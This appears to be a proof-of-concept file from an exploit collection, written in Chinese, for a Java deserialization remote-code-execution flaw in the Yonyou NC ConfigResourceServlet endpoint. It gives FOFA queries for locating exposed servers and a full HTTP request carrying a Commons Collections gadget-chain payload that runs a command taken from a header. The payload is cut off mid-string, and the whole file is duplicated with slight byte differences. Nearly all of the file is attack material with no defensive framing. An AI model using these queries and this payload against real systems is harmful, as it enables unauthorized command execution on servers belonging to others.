POC/wpoc/用友OA/用友NC接口ConfigResourceServlet存在反序列漏洞.md

## 用友NC接口ConfigResourceServlet存在反序列漏洞


## fofa
```
icon_hash="1085941792"  
app="用友-UFIDA-NC"
```

## poc
```
POST /servlet/~ic/nc.bs.framework.server.ConfigResourceServlet HTTP/1.1
Host: 192.168.63.129:8088
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Etag: ipconfig

{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x04su18sr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x06sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00*org.mozilla.javascript.DefiningClassLoader\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x01ur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0egetConstructoruq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x1asq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00t\x00\x0bnewInstanceuq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x18sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02t\x00%org.apache.logging.util.crypt.NoCryptur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x0f\xe2\xca\xfe\xba\xbe\x00\x00\x002\x00\xe3\x01\x00%org/apache/logging/util/crypt/NoCrypt\x07\x00\x01\x01\x00\x10java/lang/Object\x07\x00\x03\x01\x00\x06<init>\x01\x00\x03\x28\x29V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x0c\x00\x05\x00\x06\x0a\x00\x04\x00\x09\x01\x00\x01q\x01\x003\x28Ljava/lang/String;\x29Ljava/io/ByteArrayOutputStream;\x01\x00\x07execCmd\x0c\x00\x0d\x00\x0c\x0a\x00\x02\x00\x0e\x01\x00\x08<clinit>\x01\x00\x1ejava/lang/NoSuchFieldException\x07\x00\x11\x01\x00\x1fjava/lang/NoSuchMethodException\x07\x00\x13\x01\x00\x13java/lang/Exception\x07\x00\x15\x01\x00\x15java/lang/ThreadGroup\x07\x00\x17\x01\x00\x15java/lang/ClassLoader\x07\x00\x19\x01\x00\x17java/lang/reflect/Field\x07\x00\x1b\x01\x00\x13[Ljava/lang/Thread;\x07\x00\x1d\x01\x00\x10java/lang/Thread\x07\x00\x1f\x01\x00\x10java/lang/String\x07\x00!\x01\x00\x0ejava/util/List\x07\x00#\x01\x00\x1djava/io/ByteArrayOutputStream\x07\x00%\x01\x00\x0dStackMapTable\x01\x00\x0dcurrentThread\x01\x00\x14\x28\x29Ljava/lang/Thread;\x0c\x00\x28\x00\x29\x0a\x00 \x00*\x01\x00\x0egetThreadGroup\x01\x00\x19\x28\x29Ljava/lang/ThreadGroup;\x0c\x00,\x00-\x0a\x00 \x00.\x01\x00\x15getContextClassLoader\x01\x00\x19\x28\x29Ljava/lang/ClassLoader;\x0c\x000\x001\x0a\x00 \x002\x01\x00\x08getClass\x01\x00\x13\x28\x29Ljava/lang/Class;\x0c\x004\x005\x0a\x00\x04\x006\x01\x00\x07threads\x08\x008\x01\x00\x0fjava/lang/Class\x07\x00:\x01\x00\x10getDeclaredField\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/reflect/Field;\x0c\x00<\x00=\x0a\x00;\x00>\x01\x00\x0dsetAccessible\x01\x00\x04\x28Z\x29V\x0c\x00@\x00A\x0a\x00\x1c\x00B\x01\x00\x03get\x01\x00&\x28Ljava/lang/Object;\x29Ljava/lang/Object;\x0c\x00D\x00E\x0a\x00\x1c\x00F\x01\x00\x07getName\x01\x00\x14\x28\x29Ljava/lang/String;\x0c\x00H\x00I\x0a\x00 \x00J\x01\x00\x04exec\x08\x00L\x01\x00\x08contains\x01\x00\x1b\x28Ljava/lang/CharSequence;\x29Z\x0c\x00N\x00O\x0a\x00\"\x00P\x01\x00\x04http\x08\x00R\x01\x00\x06target\x08\x00T\x01\x00\x12java/lang/Runnable\x07\x00V\x01\x00\x06this$0\x08\x00X\x01\x00\x07handler\x08\x00Z\x01\x00\x0dgetSuperclass\x0c\x00\\\x005\x0a\x00;\x00]\x01\x00\x06global\x08\x00_\x01\x00\x0aprocessors\x08\x00a\x01\x00\x04size\x01\x00\x03\x28\x29I\x0c\x00c\x00d\x0b\x00$\x00e\x01\x00\x15\x28I\x29Ljava/lang/Object;\x0c\x00D\x00g\x0b\x00$\x00h\x01\x00\x03req\x08\x00j\x01\x00\x0bgetRespons
```

使用yakit 发包 即可查看回显内容
first commit 2025-03-04 23:12:57 +08:00			`## 用友NC接口ConfigResourceServlet存在反序列漏洞`


			`## fofa`
			```
			`icon_hash="1085941792"`
			`app="用友-UFIDA-NC"`
			```

			`## poc`
			```
			`POST /servlet/~ic/nc.bs.framework.server.ConfigResourceServlet HTTP/1.1`
			`Host: 192.168.63.129:8088`
			`Accept-Encoding: gzip`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
			`Etag: ipconfig`

			{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x04su18sr\x00org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x06sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00org.mozilla.javascript.DefiningClassLoader\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b\|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x01ur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0egetConstructoruq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x1asq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00t\x00\x0bnewInstanceuq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x18sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02t\x00%org.apache.logging.util.crypt.NoCryptur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x0f\xe2\xca\xfe\xba\xbe\x00\x00\x002\x00\xe3\x01\x00%org/apache/logging/util/crypt/NoCrypt\x07\x00\x01\x01\x00\x10java/lang/Object\x07\x00\x03\x01\x00\x06<init>\x01\x00\x03\x28\x29V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x0c\x00\x05\x00\x06\x0a\x00\x04\x00\x09\x01\x00\x01q\x01\x003\x28Ljava/lang/String;\x29Ljava/io/ByteArrayOutputStream;\x01\x00\x07execCmd\x0c\x00\x0d\x00\x0c\x0a\x00\x02\x00\x0e\x01\x00\x08<clinit>\x01\x00\x1ejava/lang/NoSuchFieldException\x07\x00\x11\x01\x00\x1fjava/lang/NoSuchMethodException\x07\x00\x13\x01\x00\x13java/lang/Exception\x07\x00\x15\x01\x00\x15java/lang/ThreadGroup\x07\x00\x17\x01\x00\x15java/lang/ClassLoader\x07\x00\x19\x01\x00\x17java/lang/reflect/Field\x07\x00\x1b\x01\x00\x13[Ljava/lang/Thread;\x07\x00\x1d\x01\x00\x10java/lang/Thread\x07\x00\x1f\x01\x00\x10java/lang/String\x07\x00!\x01\x00\x0ejava/util/List\x07\x00#\x01\x00\x1djava/io/ByteArrayOutputStream\x07\x00%\x01\x00\x0dStackMapTable\x01\x00\x0dcurrentThread\x01\x00\x14\x28\x29Ljava/lang/Thread;\x0c\x00\x28\x00\x29\x0a\x00 \x00\x01\x00\x0egetThreadGroup\x01\x00\x19\x28\x29Ljava/lang/ThreadGroup;\x0c\x00,\x00-\x0a\x00 \x00.\x01\x00\x15getContextClassLoader\x01\x00\x19\x28\x29Ljava/lang/ClassLoader;\x0c\x000\x001\x0a\x00 \x002\x01\x00\x08getClass\x01\x00\x13\x28\x29Ljava/lang/Class;\x0c\x004\x005\x0a\x00\x04\x006\x01\x00\x07threads\x08\x008\x01\x00\x0fjava/lang/Class\x07\x00:\x01\x00\x10getDeclaredField\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/reflect/Field;\x0c\x00<\x00=\x0a\x00;\x00>\x01\x00\x0dsetAccessible\x01\x00\x04\x28Z\x29V\x0c\x00@\x00A\x0a\x00\x1c\x00B\x01\x00\x03get\x01\x00&\x28Ljava/lang/Object;\x29Ljava/lang/Object;\x0c\x00D\x00E\x0a\x00\x1c\x00F\x01\x00\x07getName\x01\x00\x14\x28\x29Ljava/lang/String;\x0c\x00H\x00I\x0a\x00 \x00J\x01\x00\x04exec\x08\x00L\x01\x00\x08contains\x01\x00\x1b\x28Ljava/lang/CharSequence;\x29Z\x0c\x00N\x00O\x0a\x00\"\x00P\x01\x00\x04http\x08\x00R\x01\x00\x06target\x08\x00T\x01\x00\x12java/lang/Runnable\x07\x00V\x01\x00\x06this$0\x08\x00X\x01\x00\x07handler\x08\x00Z\x01\x00\x0dgetSuperclass\x0c\x00\\\x005\x0a\x00;\x00]\x01\x00\x06global\x08\x00_\x01\x00\x0aprocessors\x08\x00a\x01\x00\x04size\x01\x00\x03\x28\x29I\x0c\x00c\x00d\x0b\x00$\x00e\x01\x00\x15\x28I\x29Ljava/lang/Object;\x0c\x00D\x00g\x0b\x00$\x00h\x01\x00\x03req\x08\x00j\x01\x00\x0bgetRespons
			```

			`使用yakit 发包即可查看回显内容`